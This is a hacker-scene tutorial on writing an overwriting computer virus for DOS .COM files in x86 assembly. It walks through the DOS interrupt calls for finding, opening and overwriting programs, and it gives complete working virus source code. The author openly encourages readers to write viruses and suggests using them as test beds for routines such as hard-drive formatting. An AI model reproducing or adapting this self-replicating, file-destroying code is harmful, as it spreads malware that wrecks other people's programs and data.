/\---/\ RATBOY'S OVERWRITING VIRUS TUTORIAL

/\---/\ RATBOY'S OVERWRITING VIRUS TUTORIAL
( . . )
\ / WARNING: The information contain within here can be
\ / ^^^^^^^ dangerous to you mind and computer!!!!!!!!
\*/ I assume no responsiblity!!!!!!!!!
#

Well here it is my first instructional tutorial. I felt it was
nesscary for this file since I could not find any tutorials that taught
virus writing from the basic overwriting virus. Well that's how I started
and now I want to show you. So that you too can have a long and fruitful
life of codeing viruses. :)

OVERWRITING VIRUSES

-=What is an overwritting virus?

I'm glad you asked that. :) An overwriting virus is a virus that reproduces
by overwriting the first parts of a program with itself. Here is an example:

+-------------------------+ (I got this example from
| P R O G R A M | 40Hex, thanks P/S!!!!)
+-------------------------+
plus:
+--------+
| VIRUS! |
+--------+
equals:

+--------+----------------+
| VIRUS! | G R A M |
+--------+----------------+

As you can see the first part of the program was overwritten with
the virus code. Since important parts of the original program are
effectivly destroyed it won't ever run, but the virus code will.
As you can guess overwriting viruses are very destructive and not very
productive. But you must learn to walk before you can do the Polka!!

-=So what does one need to know to write an overwriting virus?
Another question I'm glad you asked. :) Well having a basic knowledge in
Assembly is a must, but it is not very differcult. As a virus writer, I
only know one programing language, Assembly. I didn't even learn BASIC.
So don't listen to those that say don't learn Assembly, it's a wonderful
programing language. At the end of this file I'll be recomending books and
things to do to help ya on your way to Assembly and virus writing.

Well let's get down to codeing!!!! :)
We will be dealing with .Com files. So here is the basic setup for a .Com
file in an Assembly source file:
-----------------------------------------------------------------------------
CODE SEGMENT
ASSUME CS:CODE,DS:CODE ;in .Com files the data, code, extra
;and stack segments are all the same.
ORG 100H ;this is where all .Com files start
;in memory. This allows room for the
;PSP.
STARTVX PROC NEAR

blah! ;all your virus body goes here
blah!
blah!
STARTVX ENDP
blah! ;all your 'db's go here etc..etc...
CODE ENDS
END STARTVX
-----------------------------------------------------------------------------

See the set up isn't really hard to follow, but the lack of info in that
example can be confusing. We'll get to a full Virus source code a little
later.
Now what is the basic setup for a simple overwriting virus? Well
let's look at the order of operations:

(1) find a file
(2) open the found file
(3) write the virus to the opened file (infect it)
(4) close the file
(5) exit

Well as you can see there is nothing but pure replication functions in this
setup. Well I wanted it to be easy and not to boog you down with encryption,
id bytes, etc... We are dealing with ZEN and the art of basic viruses!

Here we go looking at these steps of an simple overwriting virus:

(1) FIND FIRST FILE!
the inputs:

AH: 4EH
CX: FILE ATTRIBUTES
DX: OFFSET ADDRESS OF FILE NAME
DS: SEGMENT ADDRESS OF FILE NAME

Now let's see how we would put this into our little program:

mov ah,4eh ;find first service
mov cx,0000h ;we 0'ed cx for normal files
mov dx,offset star_com ;the file mask for .Com file
;you'll see
int 21h
;now of course when you said star_com you need to tell the Assembler what
;you are talking about. Here it is:

star_com: db "*.com",0

;ya see how it will work. With the use of the wild card '*' the first file
;that has the ending of .com will be found. This is easy isn't it?

Now you can see that we didn't need to touch DS: since CS=DS=ES=SS.
So the Star_com already was in the Data Segment. Yay!!!!! Love em .Com
files. Sorry need to get back on track.

Now before we can go on and talk about open a found file for writing
to(infecting), we must talk about the Disk Transfer Area (DTA). When you
find that first file, information about the file found goes into the DTA,
everything from file name to date of creation. Here's the setup:

0h db 21 dup(0) ;reserved for DOS uses
15h db 00 ;file attributes
16h dw 0000 ;file time
18h dw 0000 ;file date
1ah dd 00000000 ;file size
1eh db 13 dup(0) ;asciiz of the file name.

That is the layout of the DTA. Now the DTA lies in the PSP. The
first 256 (100h) bytes infront of the .Com file. It's address is 80h.
Most of the time in virus writing, you would want to move the DTA to a
location where you can manipulate it without possbile messing up the PSP.
Well for our case, with a simple overwriting virus, we don't need to worry.
All we are going to do is read from the DTA, the file name we just have
found. Now this is how we will address the file name, now we know that
the DTA starts at 80h, and we know that at 1eh from the DTA's begining is
the asciiz of the file name. So we just add them together and see what we
get, 80h + 1eh = 9eh. Well that is were it's located, now let's move on
to the next step.

(2) OPENING THE FOUND FILE!
the inputs:

AH: 3DH
AL: 00H ;opened for reading only
01H ;opened for writing only
02H ;opened for both reading and writing
DX: OFFSET ADDRESS OF THE FILE NAME
DS: SEGMENT ADDRESS OF THE FILE NAME

outputs:
AX: FILE HANDLE

Now look at it setup in the format we need to know.

mov ah,3dh ;open file
mov al,02h ;open it for reading and writing
mov dx,9eh ;remember this is where the name in the DTA
int 21h

Now Dos services will return a file handle of the file we just opened. The
file handle is nothing more than a number that dos uses to know where it
will read from(the file) or write to(the file). We don't want it in AX
since the next step that you will see we need it in BX. Here's a easy way
to move it:

xchg bx,ax ;that will put the file handle into bx in one
;step!!!

Ok now the down and dirty stuff. Infecting the file we just opened. Ha ha!

(3)WRITING TO THE OPENED FILE(INFECTING)
the inputs:

AH: 40H
BX: FILE HANDLE
CX: BYTES TO WRITE
DX: OFFSET OF ADDRESS OF THE BEGINING OF THE VIRUS

Here we go again with seeing what it will look like:

mov ah,40h
mov cx,offset endvx - offset startvx ;this will find the virus
;lenth, how many bytes to
;write....
mov dx,offset startvx ;where the virus starts
int 21h

Ahhhhhhhhh! I always feel so relaxed after reproducing....ahh.hh...h!
Oh...where was I, a...well now that we have copied the virus to the file,
now we can close it up.

(4)CLOSE THE FILE! ;Whata-ya live in a barn!
the inputs:
AX: 3EH
BX: FILE HANDLE

Now before we go on remember how after we opened the file that we
put the file handle in BX. So since we didn't mess with BX we should just
have to:

mov ah,3eh
int 21h

Now for the final and last step the exiting. Here ya go:
(5)EXIT!

int 20h

Well I know it isn't really pretty, but it works.
Well let's look at how all of it fits together:

-----------------------------------------------------------------------------
Code Segment
Assume CS:code,DS:code
Org 100h

startvx proc near

mov ah,4eh
mov cx,0000h
mov dx,offset star_com
int 21h

mov ah,3dh
mov al,02h
mov dx,9eh
int 21h

xchg bx,ax

mov ah,40h
mov cx,offset endvx - offset startvx
mov dx,offset startvx
int 21h

mov ah,3eh
int 21h

int 20h

startvx endp

star_com: db "*.com",0

endvx label near

code ends
end startvx

-----------------------------------------------------------------------------
Sorry I didn't put comments in, but that was done so that if you can
not read along and follow what is going on. You need to re-read this file,
and practice more Assembly.

-=Now that I know overwriting virus programing what can I use them for?
Another fine question. :) Overwriting viruses are simple, and being simple
they are fairly easy to follow and program. That in it's self will help
educate you in the basics of a virus, writing, reading, find file, etc....
Also since it's fairly easy to write up an overwriting virus you can use them
as test platforms for other routines. Formating HD's, visual displays,
encryption, etc..... This is so that you can concentrate on the how
the test routine will work not the virus.

-=Now that I have the basics, is that all I need?
OH No, there are many things that you need, the knowledge being the hardest.
Read Assembler Inside and Out, and Using Assembly, they're really good books.
You need, an Assembler(A86+TASM), lot's of source codes to learn from(some
included). It just dosen't stop there, you will need a some really good
virus scanners to track what your virus is doing. F-prot and Tbav are
great, but if you come up with a virus that is unscannerable they won't work.
That's why I highly recommend INVIRCIBLE. It will protect you from real
screw ups, track your virus movement, even unscannibles, even protect you
from your 'friends' viruses on you computer >:>. It's the best anti-virus
protection out there, you need to know your enemy, and it's a powerful tool.
The biggest and most important thing you can have is people that are helpful
enough to take the time to answer the questions that form in your mind. You
will see some of those people in the closing credits of this file. Talk to
them.

Now you are on to a long and fruitful life of making your
own viruses. Remember pratice, ask questions, read and
of course have fun!!!!!!!

*****************************************************************************

Now I would like to take the time to thank a few people:

-=*God, for making me possible
-=*My Wife, for putting up with me!!
-=*FC, thanks for all the info and help, dude!!!
-=*Invircible, yea I know it's a piece of software, but it has covered my but
enough times. Thanks Mike!!!!!!!!!!!!!!!!!
-=*Aristotle, yea Aristotle, the dude help start me out.
-=*Vlad, Immortal Riot, NuKE, Falcon, P/S, Mad Arab, Terminal Velocity..etc..